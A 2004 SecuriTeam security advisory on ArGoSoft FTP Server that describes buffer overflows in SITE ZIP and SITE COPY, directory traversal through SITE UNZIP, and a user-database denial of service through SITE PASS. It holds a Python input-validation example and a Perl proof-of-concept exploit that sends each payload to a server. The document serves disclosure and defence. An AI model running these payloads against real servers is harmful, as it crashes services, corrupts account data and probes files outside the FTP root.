[NT] ArGoSoft FTP Server Multiple Vulnerabilities (SITE ZIP, UNZIP, COPY, PASS)

From: SecuriTeam (support_at_securiteam.com)
Date: 03/02/04

    To: list@securiteam.com
    Date: 2 Mar 2004 18:23:44 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
      ArGoSoft FTP Server Multiple Vulnerabilities (SITE ZIP, UNZIP, COPY, PASS)
    ------------------------------------------------------------------------

    SUMMARY

    STORM has discovered multiple security vulnerabilities in ArGoSoft's FTP
    Server (http://www.argosoft.com/applications/ftpserver/):

    1) Three allow overflowing an internal buffer - Buffer Overflows

    2) One allows discovering whether a file exists on a server (files that
    reside outside the bound FTP root directory) - File Disclosure

    3) Another one allows causing a DoS by overwriting critical parts of the
    user database file (through the password change mechanism) in such a way
    that the user database is no longer usable - Denial of Service

    DETAILS

    Vulnerable Systems:
     * ArGoSoft version 1.4.1.4 and prior
     * ArGoSoft version 1.4.1.5

    Immune Systems:
     * ArGoSoft version 1.4.1.6

    Buffer Overflows:
    The first two vulnerabilities revolve around the SITE ZIP command: the
    length of its parameters is not checked, so the program overflows the
    internal buffer used by the command. The first is triggered by sending
    "SITE ZIP Ax512" (x512 = write the "A" character 512 times), the second
    by sending "SITE ZIP storm.zip /f:Ax2048". The third buffer overflow is
    in the "SITE COPY" command; to recreate it, send "SITE COPY Ax2048
    Ax10".

    File Disclosure:
    The file disclosure vulnerability is in the "SITE UNZIP" command. The
    parameter given to SITE UNZIP is the file it should unzip, and because
    "../" is not filtered out of it, the existence of files that reside
    outside the FTP root directory can be verified (this is done by comparing
    the responses for ../boot.ini and ../notthere.ini).

    Denial of Service:
    The denial of service vulnerability is in the "SITE PASS" command. This
    command receives as its second parameter the new password you are
    interested in using; if you give it a password that is very long, the
    user database will become corrupt and unusable.
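
    The input checks whose absence the three sections above describe, as an added example (not part of the advisory or of the vendor's fix): a per-argument length limit for the SITE subcommands and a root-containment check for their path arguments, run over constructed command lines. MAX_ARG_LEN and the function names are assumptions of this example.

```python
import posixpath

MAX_ARG_LEN = 255  # assumed limit for this example, not a value from the advisory
PATH_SUBCOMMANDS = {"ZIP", "UNZIP", "COPY"}  # arguments are file names
CHECKED = PATH_SUBCOMMANDS | {"PASS"}         # SITE subcommands named in the advisory


def escapes_root(arg):
    """True if a client-supplied path would resolve outside the FTP root."""
    path = arg.replace("\\", "/")
    if len(path) > 1 and path[1] == ":":      # drive letter such as C:/
        return True
    # A leading "/" means the virtual root, so strip it before normalising.
    norm = posixpath.normpath(path.lstrip("/"))
    return norm == ".." or norm.startswith("../")


def check_site_command(line):
    """Return a list of findings for one FTP command line (CRLF removed)."""
    parts = line.split()
    if len(parts) < 2 or parts[0].upper() != "SITE":
        return []
    sub = parts[1].upper()
    if sub not in CHECKED:
        return []
    findings = []
    for arg in parts[2:]:
        if len(arg) > MAX_ARG_LEN:
            findings.append(f"{sub}: argument of {len(arg)} characters exceeds {MAX_ARG_LEN}")
        if sub in PATH_SUBCOMMANDS and escapes_root(arg):
            findings.append(f"{sub}: path leaves the FTP root")
    return findings


# Constructed command lines: the five from the advisory plus two benign ones.
SAMPLE = [
    "SITE ZIP " + "A" * 512,
    "SITE ZIP storm.zip /f:" + "A" * 2048,
    "SITE COPY " + "A" * 2048 + " " + "A" * 10,
    "SITE UNZIP ../boot.ini",
    "SITE PASS storm " + "A" * 3500,
    "SITE UNZIP docs/../archive.zip",
    "SITE PASS storm new..pass",
]

if __name__ == "__main__":
    for cmd in SAMPLE:
        print(cmd[:40], "->", check_site_command(cmd) or "ok")
```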

    Solution:
    Upgrade to the latest version of ArGoSoft FTP Server.

    Vendor response:
    The vendor was very responsive and quick to fix the issue (within the
    first 48 hours); the newest version should fix the above vulnerabilities.
    The new version is available from the vendor's web site.

    Exploit (for all the vulnerabilities):
    #!/usr/bin/perl
    # Multiple Vulnerabilities in ArGoSoft FTP Server version 1.4 (1.4.1.4)
    # Created by Beyond Security Ltd. - All rights reserved.

    use IO::Socket;

    $host = "192.168.1.243";

    $remote = IO::Socket::INET->new ( Proto => "tcp",
         PeerAddr => $host,
         PeerPort => "2119",
        );

    unless ($remote) { die "cannot connect to ftp daemon on $host" }

    print "connected\n";
    while (<$remote>)
    {
     print $_;
     if (/220 /)
     {
      last;
     }
    }

    $remote->autoflush(1);

    my $ftp = "USER username\r\n";

    print $remote $ftp;
    print $ftp;
    sleep(1);

    while (<$remote>)
    {
     print $_;
     if (/331 /)
     {
      last;
     }
    }

    $ftp = join("", "PASS ", "password", "\r\n");
    print $remote $ftp;
    print $ftp;
    sleep(1);

    while (<$remote>)
    {
     print $_;
     if (/230 /)
     {
      last;
     }
    }

    #$ftp = join ("", "SITE ZIP ", "A"x512, "\r\n");
    #$ftp = join ("", "SITE ZIP storm.zip /f:", "A"x2048, "\r\n");
    #$ftp = join ("", "SITE COPY ", "A"x2048, " ", "A"x10, "\r\n");
    #$ftp = join ("", "SITE UNZIP ", "../boot.ini\r\n"); # Directory Traversal (we know a certain file exists)
    #$ftp = join ("", "SITE PASS ", "storm ", "A"x3500, "\r\n"); # DoS ... against the user database

    #Choose one of the above to test the vulnerabilities mentioned

    print $remote $ftp;
    print $ftp;
    sleep(1);

    while (<$remote>)
    {
     print $_;
     if (/250 Done/)
     {
      last;
     }
    }

    close $remote;

    ADDITIONAL INFORMATION

    SecuriTeam would like to thank STORM (storm@securiteam.com) for
    finding this vulnerability.
